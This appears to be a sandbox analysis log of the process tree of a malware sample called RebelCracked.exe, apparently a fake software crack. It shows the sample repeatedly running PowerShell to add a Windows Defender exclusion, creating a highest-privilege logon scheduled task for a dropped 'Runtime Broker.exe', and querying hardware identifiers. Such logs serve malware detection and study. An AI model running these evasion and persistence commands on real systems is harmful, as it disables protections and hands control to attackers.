C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST3⤵PID:2932
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:2292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"3⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST4⤵PID:240
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"6⤵PID:4380
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4512
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:1796
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"7⤵PID:3732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"5⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:5176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1128
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST6⤵PID:3160
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"6⤵
- Executes dropped EXE
PID:5344 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"7⤵
- Executes dropped EXE
PID:2664 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"8⤵PID:5400
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"6⤵
- Drops file in System32 directory
PID:5352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4780
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST7⤵PID:6132
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"7⤵
- Executes dropped EXE
PID:5580 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"8⤵
- Executes dropped EXE
PID:4724 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"9⤵PID:416
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"7⤵PID:5816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2900
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST8⤵PID:6380
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"8⤵
- Executes dropped EXE
PID:6424 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"9⤵
- Executes dropped EXE
PID:3412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"10⤵PID:3388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"8⤵PID:6436
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6168
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST9⤵PID:5384
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"9⤵
- Executes dropped EXE
PID:4692 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"10⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:1816 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"11⤵PID:828
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"9⤵PID:5300
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'10⤵
- Suspicious behavior: EnumeratesProcesses
PID:4320
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST10⤵PID:5708
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"10⤵
- Executes dropped EXE
PID:5572 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"11⤵
- Executes dropped EXE
PID:5364 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"12⤵PID:6052
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"10⤵PID:4524
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'11⤵
- Suspicious behavior: EnumeratesProcesses
PID:432
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST11⤵PID:6032
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"11⤵
- Executes dropped EXE
PID:6712 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"12⤵
- Executes dropped EXE
PID:1128 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"13⤵PID:1984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"11⤵
- Drops file in System32 directory
PID:6720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'12⤵
- Suspicious behavior: EnumeratesProcesses
PID:6568
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST12⤵PID:2940
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"12⤵
- Executes dropped EXE
PID:912 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"13⤵
- Executes dropped EXE
PID:1824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"14⤵PID:6312
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"12⤵
- Drops file in System32 directory
PID:6280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'13⤵
- Suspicious behavior: EnumeratesProcesses
PID:1260
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST13⤵PID:2084
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"13⤵
- Executes dropped EXE
PID:6200 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"14⤵
- Executes dropped EXE
PID:5808 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"15⤵PID:5668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"13⤵PID:6104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'14⤵
- Suspicious behavior: EnumeratesProcesses
PID:2732
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST14⤵PID:1556
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"14⤵
- Executes dropped EXE
PID:6904 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"15⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5820 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"16⤵PID:1216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"16⤵PID:2784
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid17⤵PID:5464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"16⤵PID:2312
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name17⤵
- Detects videocard installed
PID:4932
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"14⤵PID:7004
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'15⤵
- Suspicious behavior: EnumeratesProcesses
PID:3212
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST15⤵PID:2972
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"15⤵
- Executes dropped EXE
PID:5592 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"16⤵
- Executes dropped EXE
PID:7076 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"17⤵PID:7128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"15⤵PID:5400
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'16⤵
- Suspicious behavior: EnumeratesProcesses
PID:6868
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST16⤵PID:6976
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"16⤵
- Executes dropped EXE
PID:6368 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"17⤵
- Executes dropped EXE
PID:5956 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"18⤵PID:7068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"16⤵PID:4784
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'17⤵
- Suspicious behavior: EnumeratesProcesses
PID:5872
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST17⤵PID:5720
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"17⤵
- Executes dropped EXE
PID:6028 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"18⤵
- Executes dropped EXE
PID:3928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"19⤵PID:1240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"17⤵PID:3344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'18⤵
- Suspicious behavior: EnumeratesProcesses
PID:4088
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST18⤵PID:6132
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"18⤵
- Executes dropped EXE
PID:5676 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"19⤵
- Executes dropped EXE
PID:4088 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"20⤵PID:6968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"18⤵PID:5428
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'19⤵
- Suspicious behavior: EnumeratesProcesses
PID:5180
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST19⤵PID:1816
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"19⤵
- Executes dropped EXE
PID:6148 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"20⤵
- Executes dropped EXE
PID:6884 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"21⤵PID:3336
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"19⤵PID:6856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'20⤵
- Suspicious behavior: EnumeratesProcesses
PID:4820
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST20⤵PID:2496
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"20⤵
- Executes dropped EXE
PID:5884 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"21⤵
- Executes dropped EXE
PID:3432 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"22⤵PID:6264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"20⤵PID:5344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'21⤵
- Suspicious behavior: EnumeratesProcesses
PID:3520
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST21⤵PID:6984
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"21⤵
- Executes dropped EXE
PID:6468 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"22⤵
- Executes dropped EXE
PID:1368 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"23⤵PID:5616
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"21⤵PID:3200
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5812
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST22⤵
- Scheduled Task/Job: Scheduled Task
PID:3408
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"22⤵
- Executes dropped EXE
PID:5416 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"23⤵
- Executes dropped EXE
PID:4292 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"24⤵PID:1888
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"22⤵PID:5644
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'23⤵
- Suspicious behavior: EnumeratesProcesses
PID:6500
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST23⤵PID:1940
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"23⤵
- Executes dropped EXE
PID:4804 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"24⤵
- Executes dropped EXE
PID:6232 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"25⤵PID:4008
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"23⤵PID:6856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'24⤵
- Suspicious behavior: EnumeratesProcesses
PID:6184
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST24⤵PID:6476
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"24⤵
- Executes dropped EXE
PID:1688 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"25⤵
- Executes dropped EXE
PID:4944 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"26⤵PID:6972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"24⤵
- Drops file in System32 directory
PID:5512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'25⤵
- Suspicious behavior: EnumeratesProcesses
PID:1496
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST25⤵PID:6132
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"25⤵
- Executes dropped EXE
PID:5796 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"26⤵
- Executes dropped EXE
PID:7028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"27⤵PID:3216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"25⤵
- Drops file in System32 directory
PID:4472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'26⤵
- Suspicious behavior: EnumeratesProcesses
PID:4072
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST26⤵PID:2496
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"26⤵
- Executes dropped EXE
PID:6944 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"27⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5176 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"28⤵PID:4084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"28⤵PID:3536
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid29⤵PID:5900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"28⤵PID:2428
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV129⤵PID:6196
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name29⤵
- Detects videocard installed
PID:5916
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"26⤵PID:6180
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'27⤵
- Suspicious behavior: EnumeratesProcesses
PID:428
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST27⤵
- Scheduled Task/Job: Scheduled Task
PID:6196
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"27⤵
- Executes dropped EXE
PID:2156 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"28⤵
- Executes dropped EXE
PID:1440 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"29⤵PID:6384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"27⤵PID:6116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'28⤵PID:784
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST28⤵PID:7100
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"28⤵
- Executes dropped EXE
PID:4996 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"29⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:5228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"30⤵PID:5412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"28⤵PID:5328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'29⤵PID:4480
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST29⤵
- Scheduled Task/Job: Scheduled Task
PID:6644
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"29⤵
- Executes dropped EXE
PID:5540 -
